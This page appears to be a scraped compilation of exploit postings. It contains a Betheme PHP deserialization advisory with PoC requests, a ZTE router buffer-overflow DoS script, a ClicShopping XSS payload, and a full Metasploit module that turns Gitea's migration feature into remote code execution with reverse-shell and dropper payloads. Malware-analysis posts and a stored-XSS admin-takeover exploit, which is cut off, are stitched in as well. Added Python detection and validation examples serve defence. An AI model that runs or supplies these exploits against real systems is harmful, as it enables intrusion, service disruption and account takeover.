<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Betheme<br />Vendor URL: https://muffingroup.com/betheme/<br />Type: Deserialization of Untrusted Data [CWE-502]<br />Date found: 2022-11-02<br />Date published: 2022-11-18<br />CVSSv3 Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)<br />CVE: CVE-2022-3861<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />BeTheme 26.5.1.4 and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Ever since Betheme was just an idea, we knew that it would be different from all<br />other multipurpose WordPress themes we’d tried before.<br /><br />We wanted to build something more than just another WordPress theme, that could<br />easily adapt to any project you need to work on without writing any code. A theme<br />designed from scratch to save your time & help you enjoy your freedom...<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />The WordPress theme is vulnerable to multiple PHP object injections when processing<br />input to the following privileged WordPress AJAX routes:<br /><br />-mfn_builder_import -> "mfn-items-import" parameter<br />-mfn_builder_import_page -> "mfn-items-import-page" parameter<br />-importdata -> "import" parameter<br />-importsinglepage -> "import" parameter<br />-importfromclipboard -> "import" parameter<br /><br />To successfully exploit this vulnerability, an attacker must be authenticated with at<br />least WordPress "Contributor" rights.<br /><br />Successful exploits can allow the attacker to execute arbitrary code.<br /><br /><br />6. 
PROOF OF CONCEPT<br />===================<br />To exploit the "mfn_builder_import" ajax action, use:<br /><br />POST /wp-admin/admin-ajax.php HTTP/1.1<br />Host: localhost<br />Content-Length: 75<br />Accept: */*<br />X-Requested-With: XMLHttpRequest<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Cookie: [your-auth-cookies]<br />Connection: close<br /><br />mfn-builder-nonce=[your-nonce]&action=mfn_builder_import&mfn-items-import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=<br /><br /><br />To exploit the "mfn_builder_import_page" ajax action, use:<br /><br />POST /wp-admin/admin-ajax.php HTTP/1.1<br />Host: localhost<br />Content-Length: 123<br />Accept: */*<br />X-Requested-With: XMLHttpRequest<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Cookie: [your-auth-cookies]<br />Connection: close<br /><br />mfn-builder-nonce=[your-nonce]&action=mfn_builder_import_page&mfn-items-import-page=https://your-remote-payload.com/<br /><br /><br />To exploit the "importdata" ajax action, use:<br /><br />POST /wp-admin/admin-ajax.php HTTP/1.1<br />Host: localhost<br />Content-Length: 114<br />Accept: */*<br />X-Requested-With: XMLHttpRequest<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Cookie: [your-auth-cookies]<br />Connection: close<br /><br />mfn-builder-nonce=[your-nonce]&action=importdata&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=<br /><br /><br />To exploit the "importsinglepage" ajax action, use:<br /><br 
/>POST /wp-admin/admin-ajax.php HTTP/1.1<br />Host: localhost<br />Content-Length: 83<br />Accept: */*<br />X-Requested-With: XMLHttpRequest<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Cookie: [your-auth-cookies]<br />Connection: close<br /><br />mfn-builder-nonce=[your-nonce]&action=importsinglepage&import=https://your-remote-payload.com/<br /><br /><br />To exploit the "importfromclipboard" ajax action, use:<br /><br />POST /wp-admin/admin-ajax.php HTTP/1.1<br />Host: localhost<br />Content-Length: 123<br />Accept: */*<br />X-Requested-With: XMLHttpRequest<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Cookie: [your-auth-cookies]<br />Connection: close<br /><br />mfn-builder-nonce=[your-nonce]&action=importfromclipboard&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=<br /><br /><br />7. SOLUTION<br />===========<br />Update to version 26.6<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2022-11-01: Discovery of the vulnerability<br />2022-11-03: CVE requested from Wordfence (CNA)<br />2022-11-04: Wordfence assigns CVE-2022-3861<br />2022-11-08: Vendor notification<br />2022-11-08: Opened up a security support case on envato.com since the vendor usually doesn't respond<br />2022-11-16: Envato responds stating that the vendor released 26.6 which fixes this vulnerability<br />2022-11-18: Public disclosure<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br /></code></pre>
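<p>Added example (not part of the advisory above, and not the theme's code): a small Python triage routine for POST bodies sent to admin-ajax.php. It maps the five action/parameter pairs listed in section 5, base64-decodes the parameter value and flags PHP serialized-object syntax (the advisory's own sample value decodes to a stdClass instance), and flags remote URLs for the page-import actions, which fetch and unserialize what the URL returns. The sample bodies and nonce values are constructed.</p>

```python
"""Flag PHP object-injection attempts against the Betheme import AJAX actions.

Added example, not code from the advisory or from the theme. It parses
constructed application/x-www-form-urlencoded POST bodies of the shape shown
in the proof of concept and reports parameter values that decode to a PHP
serialized object, or that point at a remote URL for the page-import actions.
"""
import base64
import binascii
import re
from typing import List, Optional
from urllib.parse import parse_qs

# action -> parameter pairs named in section 5 of the advisory
IMPORT_PARAMS = {
    "mfn_builder_import": "mfn-items-import",
    "mfn_builder_import_page": "mfn-items-import-page",
    "importdata": "import",
    "importsinglepage": "import",
    "importfromclipboard": "import",
}

# PHP serialization prefixes that can carry a gadget: O:N:"Class" or C:N:"Class",
# plus an array wrapper a:N:{ that may contain objects
PHP_SERIALIZED = re.compile(rb'^(?:[OC]:\d+:"[A-Za-z0-9_\\]+"|a:\d+:\{)')


def decode_b64(value: str) -> Optional[bytes]:
    """Return the decoded bytes when value is well-formed base64, else None."""
    try:
        return base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None


def inspect_body(body: str) -> dict:
    """Classify one POST body sent to admin-ajax.php."""
    params = parse_qs(body, keep_blank_values=True)
    action = params.get("action", [""])[0]
    param = IMPORT_PARAMS.get(action)
    verdict = {"action": action, "param": param, "serialized": False,
               "decoded": None, "remote_url": False}
    if param is None:
        return verdict  # not one of the import actions
    value = params.get(param, [""])[0]
    decoded = decode_b64(value)
    if decoded is not None and PHP_SERIALIZED.match(decoded):
        verdict["serialized"] = True
        verdict["decoded"] = decoded.decode("latin-1")
    elif value.lower().startswith(("http://", "https://")):
        # the page-import actions fetch this URL and unserialize the response
        verdict["remote_url"] = True
    return verdict


def suspicious_bodies(bodies: List[str]) -> List[dict]:
    """Return the verdicts for the bodies that warrant an alert."""
    return [v for v in (inspect_body(b) for b in bodies)
            if v["serialized"] or v["remote_url"]]


# constructed sample bodies; nonce values are placeholders, not real tokens
SAMPLE_BODIES = [
    "mfn-builder-nonce=abcd1234&action=mfn_builder_import"
    "&mfn-items-import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=",
    "mfn-builder-nonce=abcd1234&action=importsinglepage&import=https://attacker.invalid/",
    "mfn-builder-nonce=abcd1234&action=importdata&import=eyJpdGVtcyI6W119",  # base64 JSON, benign
    "action=heartbeat&_nonce=abcd1234",
]

if __name__ == "__main__":
    for verdict in suspicious_bodies(SAMPLE_BODIES):
        print(verdict)
```

<p>The decoded value of the advisory's sample is an innocuous stdClass, which is exactly what a scanner sends first to confirm that unserialize() runs on the input; the same check catches any class name, so the alert condition is the serialization syntax itself, not a particular gadget chain.</p>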
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/aef85cf0d521eaa6aade11f95ea07ebe.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Oblivion.01.a<br />Vulnerability: Insecure Transit Password Disclosure<br />Description: The malware listens on TCP port 7826 and makes HTTP GET requests to port 80 for "/scripts/WWPMsg.dll". The system logon credentials "Pass=beacytan" are sent in plaintext via the URL query string. Third-party attackers who can sniff traffic may recover the credentials, which can also be leaked to web server logs and/or shared systems.<br /><br />Family: Oblivion<br />Type: PE32<br />MD5: aef85cf0d521eaa6aade11f95ea07ebe<br />Vuln ID: MVID-2022-0658<br />Disclosure: 11/18/2022<br /><br />Exploit/PoC:<br />tcpdump<br />GET /scripts/WWPMsg.dll?from=Oblivion&fromemail=Oblivion@Oblivion.com&subject=User+Online&body=Oblivion+Server+Online!!+[OS=Win]+[ComputerName=DESKTOP-2C4IQJO]+[IP=192.168.18.125]+[Port=7826]+[Pass=beacytan]+[Ver=0.1]&to=121768128 HTTP/1.0" 404 -<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. 
The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Router ZTE-H108NS - Stack Buffer Overflow (DoS)<br /># Date: 19-11-2022<br /># Exploit Author: George Tsimpidas<br /># Vendor: https://www.zte.com.cn/global/<br /># Firmware: H108NSV1.0.7u_ZRD_GR2_A68<br /># Usage: python zte-exploit.py <victim-ip> <port><br /># CVE: N/A<br /># Tested on: Debian 5.18.5<br /><br />#!/usr/bin/python3<br /><br />import sys<br />import socket<br />from time import sleep<br /><br />host = sys.argv[1] # Receive IP from user<br />port = int(sys.argv[2]) # Receive port from user<br /><br /># Oversized value for the IP parameter of tools_test.asp (the cyclic pattern repeated five times)<br />junk = b"1500Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae" * 5<br /><br />buffer = b"GET /cgi-bin/tools_test.asp?testFlag=1&Test_PVC=0&pingtest_type=Yes&IP=192.168.1.1" + junk + b"&TestBtn=START HTTP/1.1\r\n"<br />buffer += b"Host: 192.168.1.1\r\n"<br />buffer += b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\r\n"<br />buffer += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"<br />buffer += b"Accept-Language: en-US,en;q=0.5\r\n"<br />buffer += b"Accept-Encoding: gzip, deflate\r\n"<br />buffer += b"Authorization: Basic YWRtaW46YWRtaW4=\r\n"<br />buffer += b"Connection: Keep-Alive\r\n"<br />buffer += b"Cookie: SID=21caea85fe39c09297a2b6ad4f286752fe47e6c9c5f601c23b58432db13298f2; _TESTCOOKIESUPPORT=1; SESSIONID=53483d25\r\n"<br />buffer += b"Upgrade-Insecure-Requests: 1\r\n\r\n"<br /><br />print("[*] Sending evil payload...")<br />s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />s.connect((host, port))<br />s.send(buffer)<br />sleep(1)<br />s.close()<br />print("[+] Crashing boom boom ~ check if target is down ;)")<br /></code></pre>
<pre><code>## Title: ClicShopping_V3-Version3.402 XSS-Reflected<br />## Author: nu11secur1ty<br />## Date: 11.20.2022<br />## Vendor: https://www.clicshopping.org/forum/<br />## Software: https://github.com/ClicShopping/ClicShopping_V3/releases/tag/version3_402<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3<br /><br />## Description:<br />The name of an arbitrarily supplied URL parameter is copied into the<br />value of an HTML tag attribute which is encapsulated in double<br />quotation marks.<br />An attacker can trick users into opening a malicious link, obtain<br />sensitive information, or damage components of the affected system.<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Payload:<br /><br />```js<br />GET /ClicShopping_V3-version3_402/index.php?Search&AdvancedSearch&bel9c%22onmouseover%3d%22alert(`Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole`)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22zgm9j=1<br />HTTP/1.1<br />Host: pwnedhost.com<br />Accept-Encoding: gzip, deflate<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br />Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br /><br />```<br /><br />## 
Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/mgbftx)<br /><br />## Time spent<br />`1:00`<br /><br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/71a76adeadc7b51218d265771fc2b0d1.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan.Win32.Platinum.gen<br />Vulnerability: Arbitrary Code Execution<br />Description: The malware looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a vulnerable DLL to execute our own code, and control and terminate the malware. Once loaded, the exploit DLL checks whether the current directory is "C:\Windows\System32"; if not, it grabs its own process ID and terminates the process. All basic tests were conducted successfully in a virtual machine environment.<br />Family: PlatinumGroup<br />Type: PE32<br />MD5: 71a76adeadc7b51218d265771fc2b0d1<br />Vuln ID: MVID-2022-0657<br />Dropped files: Adobe_Update_Sync.exe<br />Disclosure: 11/18/2022 <br /><br /><br />Exploit/PoC:<br />1) Compile the following C code as "WTSAPI32.dll"<br />2) Place the DLL in the same directory as the malware<br />3) Optional - Hide it: attrib +s +h "WTSAPI32.dll"<br />4) Run the malware<br /><br />#include "windows.h"<br />#include "string.h" // strcmp<br />#include "process.h" // getpid under MinGW<br /><br />//By malvuln - November 2022<br />//Purpose: PWN Platinum Group malware strain MD5: 71a76adeadc7b51218d265771fc2b0d1<br /><br />//gcc -c WTSAPI32.c -m32<br />//gcc -shared -o WTSAPI32.dll WTSAPI32.o -m32<br /><br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBox(NULL, "Platinum Group\nPWNED!!! by Malvuln", "Code Exec PoC", MB_OK);<br /> TCHAR buf[MAX_PATH];<br /> // Only act when loaded from the malware's directory, not from the genuine System32 copy<br /> if(GetCurrentDirectory(MAX_PATH, buf))<br /> if(strcmp("C:\\Windows\\System32", buf) != 0){<br /> // Terminate the host process (the malware) that loaded this DLL<br /> HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());<br /> if (NULL != handle) { <br /> TerminateProcess(handle, 0);<br /> CloseHandle(handle);<br /> }<br /> }<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HttpServer<br /> include Msf::Exploit::Remote::HTTP::Gitea<br /> include Msf::Exploit::CmdStager<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Gitea Git Fetch Remote Code Execution',<br /> 'Description' => %q{<br /> This module exploits Git fetch command in Gitea repository migration<br /> process that leads to a remote command execution on the system.<br /> This vulnerability affect Gitea before 1.16.7 version.<br /> },<br /> 'Author' => [<br /> 'wuhan005', # Original PoC<br /> 'li4n0', # Original PoC<br /> 'krastanoel' # MSF Module<br /> ],<br /> 'References' => [<br /> ['CVE', '2022-30781'],<br /> ['URL', 'https://tttang.com/archive/1607/']<br /> ],<br /> 'DisclosureDate' => '2022-05-16',<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => %w[unix linux win],<br /> 'Arch' => ARCH_CMD,<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => %i[curl wget echo printf],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Windows Command',<br /> {<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :win_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 
'cmd/windows/powershell_reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Windows Dropper',<br /> {<br /> 'Platform' => 'win',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :win_dropper,<br /> 'CmdStagerFlavor' => [ 'psh_invokewebrequest' ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',<br /> 'CMDSTAGER::URIPATH' => '/payloads'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultOptions' => { 'WfsDelay' => 30 },<br /> 'DefaultTarget' => 1,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => []<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> Opt::RPORT(3000),<br /> OptString.new('USERNAME', [true, 'Username to authenticate with']),<br /> OptString.new('PASSWORD', [true, 'Password to use']),<br /> OptString.new('URIPATH', [false, 'The URI to use for this exploit', '/']),<br /> ])<br /> end<br /><br /> def cleanup<br /> super<br /> return if @uid.nil? || @migrate_repo_created.nil?<br /><br /> [@repo_name, @migrate_repo_name].each do |name|<br /> res = gitea_remove_repo(repo_path(name))<br /> if res.nil? 
|| res&.code == 200<br /> vprint_warning("Unable to remove repository '#{name}'")<br /> elsif res&.code == 404<br /> vprint_warning("Repository '#{name}' not found, possibly already deleted")<br /> else<br /> vprint_status("Successfully cleanup repository '#{name}'")<br /> end<br /> end<br /> end<br /><br /> def check<br /> return CheckCode::Safe('USERNAME can\'t be blank') if datastore['username'].blank?<br /><br /> v = get_gitea_version<br /> gitea_login(datastore['username'], datastore['password'])<br /><br /> if Rex::Version.new(v) <= Rex::Version.new('1.16.6')<br /> return CheckCode::Appears("Version detected: #{v}")<br /> end<br /><br /> CheckCode::Safe("Version detected: #{v}")<br /> rescue Msf::Exploit::Remote::HTTP::Gitea::Error::UnknownError => e<br /> return CheckCode::Unknown(e.message)<br /> rescue Msf::Exploit::Remote::HTTP::Gitea::Error::VersionError => e<br /> return CheckCode::Detected(e.message)<br /> rescue Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError,<br /> Msf::Exploit::Remote::HTTP::Gitea::Error::AuthenticationError => e<br /> return CheckCode::Safe(e.message)<br /> end<br /><br /> def primer<br /> [<br /> '/api/v1/version', '/api/v1/settings/api',<br /> "/api/v1/repos/#{@migrate_repo_path}",<br /> "/api/v1/repos/#{@migrate_repo_path}/pulls",<br /> "/api/v1/repos/#{@migrate_repo_path}/topics"<br /> ].each { |uri| hardcoded_uripath(uri) } # adding resources<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> if target['Type'] == :win_dropper<br /> # Git on Windows will pass the command to `sh.exe` and not `cmd`.<br /> # This requires some adjustments:<br /> # - Windows environment variables are mapped by `sh.exe`: `%VAR%` becomes `$VAR`<br /> # - `cmd` uses `&` to join multiple commands, whereas `sh.exe` uses `&&`.<br /> # - Backslashes need to be escaped with `sh.exe`<br /> cmd = cmd.gsub(/%(\w+)%/) { "$#{::Regexp.last_match(1)}" }.gsub(/&/) { '&&' }.gsub(/\\/) { '\\\\\\' }<br /> end<br /> vprint_status("Executing command: 
#{cmd}")<br /><br /> @repo_name = rand_text_alphanumeric(6..15)<br /> @migrate_repo_name = rand_text_alphanumeric(6..15)<br /> @migrate_repo_path = repo_path(@migrate_repo_name)<br /><br /> vprint_status("Creating repository \"#{@repo_name}\"")<br /> @uid = gitea_create_repo(@repo_name)<br /> vprint_good('Repository created')<br /> vprint_status('Migrating repository')<br /> clone_url = "http://#{srvhost_addr}:#{srvport}/#{@migrate_repo_path}"<br /> auth_token = rand_text_alphanumeric(6..15)<br /> @migrate_repo_created = gitea_migrate_repo(@migrate_repo_name, @uid, clone_url, auth_token)<br /> @p = cmd<br /> rescue Msf::Exploit::Remote::HTTP::Gitea::Error::MigrationError,<br /> Msf::Exploit::Remote::HTTP::Gitea::Error::RepositoryError,<br /> Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError => e<br /> fail_with(Failure::UnexpectedReply, e.message)<br /> end<br /><br /> def exploit<br /> unless datastore['AutoCheck']<br /> fail_with(Failure::BadConfig, 'USERNAME can\'t be blank') if datastore['username'].blank?<br /> gitea_login(datastore['username'], datastore['password'])<br /> end<br /><br /> start_service<br /> primer<br /><br /> case target['Type']<br /> when :unix_cmd, :win_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper, :win_dropper<br /> datastore['CMDSTAGER::URIPATH'] = "/#{rand_text_alphanumeric(6..15)}"<br /> execute_cmdstager(background: true, delay: 1)<br /> end<br /> rescue Timeout::Error => e<br /> fail_with(Failure::TimeoutExpired, e.message)<br /> rescue Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError => e<br /> fail_with(Failure::UnexpectedReply, e.message)<br /> rescue Msf::Exploit::Remote::HTTP::Gitea::Error::AuthenticationError => e<br /> fail_with(Failure::NoAccess, e.message)<br /> end<br /><br /> def repo_path(name)<br /> "#{datastore['username']}/#{name}"<br /> end<br /><br /> def on_request_uri(cli, req)<br /> case req.uri<br /> when '/api/v1/version'<br /> send_response(cli, '{"version": "1.16.6"}')<br /> when 
'/api/v1/settings/api'<br /> data = {<br /> max_response_items: 50, default_paging_num: 30,<br /> default_git_trees_per_page: 1000, default_max_blob_size: 10485760<br /> }<br /> send_response(cli, data.to_json)<br /> when "/api/v1/repos/#{@migrate_repo_path}"<br /> data = {<br /> clone_url: "#{full_uri}#{datastore['username']}/#{@repo_name}",<br /> owner: { login: datastore['username'] }<br /> }<br /> send_response(cli, data.to_json)<br /> when "/api/v1/repos/#{@migrate_repo_path}/topics?limit=0&page=1"<br /> send_response(cli, '{"topics":[]}')<br /> when "/api/v1/repos/#{@migrate_repo_path}/pulls?limit=50&page=1&state=all"<br /> data = [<br /> {<br /> base: {<br /> ref: 'master'<br /> },<br /> head: {<br /> ref: "--upload-pack=#{@p}",<br /> repo: {<br /> clone_url: './',<br /> owner: { login: 'master' }<br /> }<br /> },<br /> updated_at: '2001-01-01T05:00:00+01:00',<br /> user: {}<br /> }<br /> ]<br /> send_response(cli, data.to_json)<br /> when datastore['CMDSTAGER::URIPATH']<br /> super<br /> end<br /> end<br />end<br /></code></pre>
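<p>Added example, not Gitea's code and not part of the Metasploit module above. The module's fake pull-request JSON carries a head ref of the form "--upload-pack=COMMAND" and a clone_url of "./"; a migration that hands those values to git fetch as positional arguments lets the ref be parsed as an option. The Python below shows the input validation a migration component should apply before shelling out: a ref-name check that approximates git's check-ref-format rules and rejects a leading dash, a clone-URL check that allows only absolute http(s) URLs, and an argv builder that places untrusted values after the "--" options terminator. Function names and the refspec layout are this example's own assumptions.</p>

```python
"""Validate ref names and clone URLs before they reach a git command line.

Added example; not Gitea's code. The checks approximate git's
check-ref-format rules plus a leading-dash ban, and build_fetch_argv puts
every untrusted value after "--" so git cannot read it as an option.
"""
import re
from typing import List
from urllib.parse import urlsplit

FORBIDDEN_SUBSTRINGS = ("..", "@{", "//", "\\")
# space, ~, ^, :, ?, *, [, control characters and DEL are not allowed in refs
FORBIDDEN_CHARS = set(" ~^:?*[") | {chr(c) for c in range(32)} | {chr(127)}


def is_safe_ref_name(ref: str) -> bool:
    """True if ref is a plausible git ref path and cannot be read as an option."""
    if not ref or ref.startswith("-"):
        return False  # "--upload-pack=..." and friends stop here
    if any(s in ref for s in FORBIDDEN_SUBSTRINGS):
        return False
    if any(ch in FORBIDDEN_CHARS for ch in ref):
        return False
    if ref.endswith(("/", ".", ".lock")) or ref == "@":
        return False
    for component in ref.split("/"):
        if not component or component.startswith(".") or component.endswith(".lock"):
            return False
    return True


def is_safe_clone_url(url: str) -> bool:
    """Allow only absolute http(s) URLs: no local paths, no ext:: or file:// transports."""
    parts = urlsplit(url)
    return parts.scheme in ("http", "https") and bool(parts.netloc) and not url.startswith("-")


def build_fetch_argv(clone_url: str, head_ref: str, pr_index: int) -> List[str]:
    """Build the git fetch argv for one migrated pull request, rejecting unsafe input."""
    if not is_safe_clone_url(clone_url):
        raise ValueError(f"refusing clone_url {clone_url!r}")
    if not is_safe_ref_name(head_ref):
        raise ValueError(f"refusing head ref {head_ref!r}")
    refspec = f"refs/heads/{head_ref}:refs/pull/{pr_index}/head"
    # "--" ends option parsing, so nothing after it can be interpreted as a flag
    return ["git", "fetch", "--", clone_url, refspec]


if __name__ == "__main__":
    # constructed pull-request records: one benign, two shaped like the module's response
    for url, ref in [("https://gitea.example/owner/repo.git", "feature/login"),
                     ("https://gitea.example/owner/repo.git", "--upload-pack=id"),
                     ("./", "master")]:
        try:
            print(build_fetch_argv(url, ref, 7))
        except ValueError as exc:
            print("rejected:", exc)
```

<p>Validation and the options terminator are complementary: the terminator defends the one call site, while the ref check rejects the record at the API boundary so it never reaches any later git invocation that might forget the terminator.</p>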
<pre><code># Exploit Title: Revenue Collection System v1.0 - Authentication Bypass via Stored XSS<br /># Exploit Author: Joe Pollock<br /># Date: November 16, 2022<br /># Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/rates.zip<br /># Tested on: Kali Linux, Apache, Mysql<br /># CVE: T.B.C<br /># Vendor: Kapiya<br /># Version: 1.0<br /># Exploit Description:<br /># Revenue Collection System v1.0 suffers from a Stored Cross-Site Scripting vulnerability allowing an authenticated <br /># client user to add an administrative user account to the application then log in as the newly created admin.<br /><br />To reproduce this exploit, log in as a client user, then navigate to the 'Help' functionality (/index.php?page=help).<br />The help functionality is used to contact an administrator by sending a message. Paste the JavaScript code below into the<br />'Your Message' textbox, then click 'Send'. When an administrator views this message, an administrative user account will<br />be added to the application with username "admin_new" and password "Test123Test123". Using these credentials, it should<br />now be possible to log in to the application via the administrative login at /admin/login.php (Note: change the<br />'target', 'x_Username', and 'x_Passsword' values as required).<br /><br /><script><br />var target = 